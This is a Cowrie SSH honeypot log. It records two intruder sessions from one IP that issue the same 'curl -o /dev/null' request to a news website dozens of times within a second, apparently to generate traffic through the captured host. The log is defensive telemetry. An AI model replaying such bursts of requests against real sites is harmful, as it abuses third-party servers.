{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.189570Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.191898Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.193223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.197252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.200850Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.203532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.206759Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.208450Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.209706Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.222851Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.228647Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.238318Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.241696Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.242723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.244767Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.247386Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.248328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.251522Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.282105Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.283927Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.287798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.289144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.290168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.322501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.323720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.328012Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.329152Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.335508Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.337681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.356552Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.361835Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.363445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.364598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.369978Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.370753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.374100Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.382813Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.401292Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.402599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.403598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.410747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.411808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.423724Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.430958Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.440641Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.441628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.448529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.450020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.459023Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.482031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.483127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.487097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.488324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.490523Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.515105Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.521478Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.522605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.527676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.528960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.540813Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.560220Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.561447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.564676Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.566638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.567551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.598855Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.600139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.603497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.604596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.642234Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.643356Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.645192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.646133Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.680672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.681672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.683563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.684569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.721874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.722962Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.725960Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.726977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.760618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.761552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.765845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.766561Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.802767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.803894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.808839Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.809953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
